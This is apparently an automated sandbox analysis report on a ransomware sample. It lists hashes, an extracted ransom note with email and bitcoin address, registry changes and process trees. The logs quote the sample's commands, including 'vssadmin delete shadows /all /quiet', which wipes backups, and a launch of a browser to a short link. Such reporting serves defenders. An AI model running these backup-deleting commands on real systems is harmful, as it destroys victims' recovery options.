Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
30-10-2020 05:07
Static task
static1
Behavioral task
behavioral1
Sample
6.exe_.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
6.exe_.exe
Resource
win10v20201028
General
-
Target
6.exe_.exe
-
Size
26KB
-
MD5
0f0d5631cc8749e8a8a2f61ca909dcfc
-
SHA1
ee79e938a80d1d0a955899f56d5f8f37bee38de0
-
SHA256
e404f26379df9df89844dbd55120dccf383c3b793e0f08d84ee40f82d0cc334a
-
SHA512
5b1560a5029155519af379cf9d0cce82a0d96fe7fb6af3888310a83fd45ac32ee9dd110f43721cd2313cb33fee9739bf86470b3083c5c4b75a74837a19bc0b0c
Malware Config
Extracted
C:\Users\Admin\Pictures\HELP_DECRYPT_YOUR_FILES.txt
bondbond1@protonmail.com
3GDa7CcSjsW7Q29b16NiZ6DKxWauhJmKKq
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
6.exe_.exedescription ioc process File renamed C:\Users\Admin\Pictures\MoveDisable.raw => C:\Users\Admin\Pictures\MoveDisable.raw.bondy 6.exe_.exe File renamed C:\Users\Admin\Pictures\StartEnter.raw => C:\Users\Admin\Pictures\StartEnter.raw.bondy 6.exe_.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe -
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exepid process 1292 vssadmin.exe 1560 vssadmin.exe -
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c003f99382aed601 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000033044fc40189d459fe40d0e3dcc9b6600000000020000000000106600000001000020000000d3019773f99e1c8a5fbf0835145579c1b17366ac8ed1407f1b3d512d7697c0c8000000000e8000000002000020000000c8e7bf8b381f5892498333881644ab03199fc25e0f3f84bb0acb931f6df630a9200000009fb99c4e1c13f6fec1cfc35ef9575399d8a2e01c1097a96eb8b171f71c536154400000007a020abab0864b4d1a1297d7f90d26a6d7f52cea183d76cc52d33f3517641ea7f9a28c0ea8eec3a7c0c65d5ae18994faa421afff44c48dd7e6b02e506eb86ff3 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "310802827" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000033044fc40189d459fe40d0e3dcc9b66000000000200000000001066000000010000200000000355f7c53016fbd34d0a38530999752e4d57e5ad953d0344b43d59c42ce9baef000000000e8000000002000020000000605f38aad5ed59724f6dbd3ce8cf1a39605df24d5332f34a92a0d8b78019b27390000000484a557ef5087837fa416bab77740fd6edbe127f9a67e66c3db607cc1d72f6fccdf345d82034aaff16fb8a5618fd1e2e612645fdb5512a574ae0d24052ddb75e97ea394281deee3a30710e67677d532b1e348bea752dd8847fd8494617b259bb6a38c8a8b3594e290e9757b071e7282a09fe99a0f7d051a0cb16d920d8a3c03c12ec640ee3a66b35e26740d96d0b69de4000000017ddc41517053866020ac1f1820b52f6db1b40996ad59921339532a12f13bd2678080406aaf1439bab2bc386ba2f290c5d79fc0f7642b92d0e4bdf5ecc2d26ff iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{BADDAAA1-1A75-11EB-A3A5-424ABE5A776C} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
iexplore.exepid process 848 iexplore.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
vssvc.exedescription pid process Token: SeBackupPrivilege 1956 vssvc.exe Token: SeRestorePrivilege 1956 vssvc.exe Token: SeAuditPrivilege 1956 vssvc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 848 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid process 848 iexplore.exe 848 iexplore.exe 760 IEXPLORE.EXE 760 IEXPLORE.EXE 760 IEXPLORE.EXE 760 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 25 IoCs
Processes:
6.exe_.execmd.execmd.execmd.exeiexplore.exedescription pid process target process PID 1688 wrote to memory of 1168 1688 6.exe_.exe cmd.exe PID 1688 wrote to memory of 1168 1688 6.exe_.exe cmd.exe PID 1688 wrote to memory of 1168 1688 6.exe_.exe cmd.exe PID 1688 wrote to memory of 1028 1688 6.exe_.exe cmd.exe PID 1688 wrote to memory of 1028 1688 6.exe_.exe cmd.exe PID 1688 wrote to memory of 1028 1688 6.exe_.exe cmd.exe PID 1028 wrote to memory of 1292 1028 cmd.exe vssadmin.exe PID 1028 wrote to memory of 1292 1028 cmd.exe vssadmin.exe PID 1028 wrote to memory of 1292 1028 cmd.exe vssadmin.exe PID 1168 wrote to memory of 2000 1168 cmd.exe reg.exe PID 1168 wrote to memory of 2000 1168 cmd.exe reg.exe PID 1168 wrote to memory of 2000 1168 cmd.exe reg.exe PID 1688 wrote to memory of 1712 1688 6.exe_.exe cmd.exe PID 1688 wrote to memory of 1712 1688 6.exe_.exe cmd.exe PID 1688 wrote to memory of 1712 1688 6.exe_.exe cmd.exe PID 1712 wrote to memory of 1560 1712 cmd.exe vssadmin.exe PID 1712 wrote to memory of 1560 1712 cmd.exe vssadmin.exe PID 1712 wrote to memory of 1560 1712 cmd.exe vssadmin.exe PID 1688 wrote to memory of 848 1688 6.exe_.exe iexplore.exe PID 1688 wrote to memory of 848 1688 6.exe_.exe iexplore.exe PID 1688 wrote to memory of 848 1688 6.exe_.exe iexplore.exe PID 848 wrote to memory of 760 848 iexplore.exe IEXPLORE.EXE PID 848 wrote to memory of 760 848 iexplore.exe IEXPLORE.EXE PID 848 wrote to memory of 760 848 iexplore.exe IEXPLORE.EXE PID 848 wrote to memory of 760 848 iexplore.exe IEXPLORE.EXE
Processes
-
C:\Users\Admin\AppData\Local\Temp\6.exe_.exe"C:\Users\Admin\AppData\Local\Temp\6.exe_.exe"1⤵
- Modifies extensions of user files
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
-
C:\Windows\system32\cmd.exe"cmd.exe" /c vssadmin.exe delete shadows /all /quiet2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exe"cmd.exe" /c vssadmin.exe delete shadows /all /quiet2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet3⤵
- Interacts with shadow copies
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://2no.co/1SHYt72⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:848 CREDAT:275457 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015MD5
191719adfa0a348195c83103586b5905
SHA1fbc775b9f645124b1dd37f1eab7087b1a5d0bf57
SHA256ee4b7ef74bf224d4d0cb065ce94d9dddb574f70e7afb3aaf5bf4b7bf53c0a983
SHA5129bdc8de49869b23e64aa2867207d5dda36a1b714c8b0b1647411e57cfe485414685b1a120a7ea73a71e230384b3fdc25282edf6d370011312a528460815082de
-
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\s7iy1jn\imagestore.datMD5
c61cd898b477ed17e75cec6f6471813d
SHA140011d808c0282ce8adb9e2c6c6e831aa3bbc67b
SHA256af4dadc1cfc2f4db490ec7b66e36587b18ad3e7ac2582f336dac91127d3c54c9
SHA512ab9541be776005fd270ac71ab1cc4bbc9dbed1e5c5db35b0dfefae43dd3439c0595271da5aad2323c630fe6749a2397a3649194a49f8d79a7c0ba39c996a847d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\CWT9VBTE.txtMD5
71c3c45b5899fd410c5af50a95735b92
SHA1efe186d8d83d2897ac966a08724ea5ac9b59f84c
SHA256658f10e1f39a02f3a715d3b50af114088cd85d4129de05dbc253bf31cb7a1300
SHA512241eeb763a3af9f0745f09eab158870b44e13a8a4f58a86d76ccbbe516419557c4e3315f00973294cd1a92e3f3139f53fb30ff65836fe9dae75d2d1ff339434c
-
memory/760-11-0x0000000000000000-mapping.dmp
-
memory/848-9-0x0000000000000000-mapping.dmp
-
memory/900-10-0x000007FEF5350000-0x000007FEF55CA000-memory.dmpFilesize
2.5MB
-
memory/1028-4-0x0000000000000000-mapping.dmp
-
memory/1168-3-0x0000000000000000-mapping.dmp
-
memory/1292-5-0x0000000000000000-mapping.dmp
-
memory/1560-8-0x0000000000000000-mapping.dmp
-
memory/1688-0-0x000007FEF55D0000-0x000007FEF5FBC000-memory.dmpFilesize
9.9MB
-
memory/1688-1-0x0000000000AD0000-0x0000000000AD1000-memory.dmpFilesize
4KB
-
memory/1712-7-0x0000000000000000-mapping.dmp
-
memory/2000-6-0x0000000000000000-mapping.dmp